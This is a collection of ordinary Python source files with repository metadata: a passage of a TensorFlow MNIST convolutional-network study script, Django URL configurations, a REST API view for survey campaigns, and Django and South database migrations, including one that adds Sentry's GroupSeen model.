L2 = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L2_flat = tf.reshape(L2, [-1, 7*7*64]) # flatten back to one vector per image
'''
Tensor("Conv2D_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("Relu_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("MaxPool_1:0", shape=(?, 7, 7, 64), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 3136), dtype=float32)
'''
L2 = tf.reshape(L2, [-1,7*7*64]) # shape taken from the printout above
W3 = tf.get_variable("W3", shape=[7*7*64, 10], initializer=tf.contrib.layers.xavier_initializer())
b = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b
# define cost/Loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
print('Learning started. It takes sometime.')
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
##########################
### 3-layer CNN hands-on (MNIST)
##########################
##########################
##########################
##########################
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
import random
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
keep_prob = tf.placeholder(tf.float32)
nb_classes = 10
X = tf.placeholder(tf.float32, [None, 784])
X_img = tf.reshape(X, [-1, 28, 28, 1]) # img 28x28x1 (black/white)
Y = tf.placeholder(tf.float32, [None, nb_classes])
# L1 ImgIn shape=(?, 28, 28, 1)
W1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01)) # filter height/width, input channels, number of filters
# W1 = tf.get_variable("W1", shape=[3,3,1,32], initializer=tf.contrib.layers.xavier_initializer())???
# after conv -> (?, 28, 28, 32)
# after pool -> (?, 14, 14, 32)
L1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')
# print(L1)
L1 = tf.nn.relu(L1)
L1 = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') # max pooling with stride 2
L1 = tf.nn.dropout(L1, keep_prob=keep_prob)
'''
Tensor("Conv2D:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("Relu:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("MaxPool:0", shape=(?, 14, 14, 32), dtype=float32) # 1층에서 출력값!!!!!의 형태
'''
# L2 ImgIn shape=(?, 14, 14, 32)
W2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01)) # filter size, filter depth (matches the 32 channels from L1), number of filters (64 feature maps out)
# Conv ->(?, 14, 14, 64)
# Pool ->(?, 7, 7, 64)
L2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')
L2 = tf.nn.relu(L2)
L2 = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L2 = tf.nn.dropout(L2, keep_prob=keep_prob)
'''
Tensor("Conv2D_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("Relu_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("MaxPool_1:0", shape=(?, 7, 7, 64), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 3136), dtype=float32)
'''
W3 = tf.Variable(tf.random_normal([3,3,64,128], stddev=0.01))
L3 = tf.nn.conv2d(L2, W3, strides=[1,1,1,1], padding='SAME')
L3 = tf.nn.relu(L3)
L3 = tf.nn.max_pool(L3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L3 = tf.nn.dropout(L3, keep_prob=keep_prob)
L3 = tf.reshape(L3, [-1, 128*4*4])
'''
Tensor("Conv2D_2:0", shape=(?, 7, 7, 128), dtype=float32)
Tensor("Relu_2:0", shape=(?, 7, 7, 128), dtype=float32)
Tensor("MaxPool_2:0", shape=(?, 4, 4, 128), dtype=float32)
Tensor("dropout_2/mul:0", shape=(?, 4, 4, 128), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 2048), dtype=float32)
'''
W4 = tf.get_variable("W4", shape=[128*4*4, 625], initializer=tf.contrib.layers.xavier_initializer())
b4 = tf.Variable(tf.random_normal([625]))
L4 = tf.nn.relu(tf.matmul(L3, W4) + b4)
L4 = tf.nn.dropout(L4, keep_prob=keep_prob)
'''
Tensor("Relu_3:0", shape=(?, 625), dtype=float32)
Tensor("dropout_3/mul:0", shape=(?, 625), dtype=float32)
'''
# L5 final fc 625 inputs -> 10 outputs
W5 = tf.get_variable("W5", shape=[625, 10], initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.Variable(tf.random_normal([10]))
logits = tf.matmul(L4, W5) + b5
'''
Tensor("add_1:0", shape=(?, 10), dtype=float32)
'''
# define cost/Loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
print('Learning started. It takes sometime.')
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X:batch_xs, Y:batch_ys, keep_prob:0.7}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X:mnist.test.images, Y:mnist.test.labels, keep_prob:1}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
|
ghost9023/DeepLearningPythonStudy
|
DeepLearning/DeepLearning/02_Deep_ChoTH/tensorflow_prac.py
|
Python
|
mit
| 18,788 | 0.011447 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url
from . import feeds, views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='list'),
url(
r'^category/(?P<slug>[-\w]+)/$',
views.PostListCategoryView.as_view(),
name='post-list-category'
),
url(
r'^(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)/$',
views.PostDetailView.as_view(),
name='post-detail'
),
url(r'^feed/$', feeds.NewsFeed(), name='feed'),
url(r'^feed/(?P<slug>[-\w]+)/$', feeds.NewsCategoryFeed(), name='category-feed'),
]
if getattr(settings, 'GLITTER_NEWS_TAGS', False):
urlpatterns += [
url(r'^tag/(?P<slug>[-\w]+)/$', views.PostListTagView.as_view(), name='post-list-tag'),
]
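# Reversal sketch (assumption: these patterns are included under the app
# namespace "glitter_news"; the resulting path depends on where they are
# mounted). Resolving the post-detail route above:
#
#   from django.urls import reverse
#   reverse('glitter_news:post-detail',
#           kwargs={'year': '2017', 'month': '09', 'day': '14', 'slug': 'my-post'})
#   # -> '/2017/09/14/my-post/' when mounted at the site root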
|
blancltd/glitter-news
|
glitter_news/urls.py
|
Python
|
bsd-2-clause
| 849 | 0.002356 |
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from rest_framework import generics
from ..mixins import CampaignMixin
from .serializers import CampaignSerializer
LOGGER = logging.getLogger(__name__)
class CampaignAPIView(CampaignMixin, generics.RetrieveDestroyAPIView):
"""
Retrieves a campaign
Retrieves the details of a ``Campaign``.
**Tags**: survey
**Examples**
.. code-block:: http
GET /api/cowork/campaign/best-practices/ HTTP/1.1
responds
.. code-block:: json
{
"slug": "best-practices",
"account": "envconnect",
"title": "Assessment on Best Practices",
"active": true,
"quizz_mode": false,
"questions": [
{
"path": "/product-design",
"title": "Product Design",
"unit": "assessment-choices",
},
{
"path": "/packaging-design",
"title": "Packaging Design",
"unit": "assessment-choices",
}
]
}
"""
serializer_class = CampaignSerializer
def get_object(self):
return self.campaign
def delete(self, request, *args, **kwargs):
"""
Deletes a campaign
Removes a ``Campaign`` and all associated ``Sample``
from the database.
**Tags**: survey
**Examples**
.. code-block:: http
DELETE /api/cowork/campaign/best-practices/ HTTP/1.1
"""
#pylint:disable=useless-super-delegation
return super(CampaignAPIView, self).delete(request, *args, **kwargs)
|
djaodjin/djaodjin-survey
|
survey/api/campaigns.py
|
Python
|
bsd-2-clause
| 3,013 | 0.000332 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-14 01:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import storage.models.labels
class Migration(migrations.Migration):
dependencies = [
('storage', '0014_auto_20170914_0146'),
]
operations = [
migrations.RemoveField(
model_name='accesslayer',
name='active_flag',
),
migrations.RemoveField(
model_name='accesslayer',
name='created_by',
),
migrations.RemoveField(
model_name='accesslayer',
name='creation_date',
),
migrations.RemoveField(
model_name='accesslayer',
name='last_modified',
),
migrations.RemoveField(
model_name='accesslayer',
name='updated_by',
),
migrations.AlterField(
model_name='accesslayer',
name='source',
field=models.ForeignKey(blank=True, default=storage.models.labels.GroupDefaultLabel('Access Layer Source'), help_text='the access layer source', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='access_layer', to='storage.Label'),
),
]
|
MartinPaulo/resplat
|
storage/migrations/0015_auto_20170914_0154.py
|
Python
|
lgpl-3.0
| 1,300 | 0.000769 |
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
url(r'^', include('frontend.urls'))
]
|
alvcarmona/efficiencycalculatorweb
|
effcalculator/effcalculator/urls.py
|
Python
|
gpl-3.0
| 915 | 0.001093 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupSeen'
db.create_table(u'sentry_groupseen', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('user', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.User'], db_index=False)),
('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal(u'sentry', ['GroupSeen'])
# Adding unique constraint on 'GroupSeen', fields ['group', 'user']
db.create_unique(u'sentry_groupseen', ['user_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'GroupSeen', fields ['group', 'user']
db.delete_unique(u'sentry_groupseen', ['user_id', 'group_id'])
# Deleting model 'GroupSeen'
db.delete_table(u'sentry_groupseen')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'})
},
u'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': u"orm['sentry.AlertRelatedGroup']", 'to': u"orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
u'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
u'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
u'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"})
},
u'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
u'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': u"orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': u"orm['sentry.User']"})
},
u'sentry.groupcountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'GroupCountByMinute', 'db_table': "'sentry_messagecountbyminute'"},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
u'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'db_index': 'False'})
},
u'sentry.grouptag': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTag', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'unique': 'True'})
},
u'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
u'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': u"orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']", 'null': 'True'})
},
u'sentry.projectcountbyminute': {
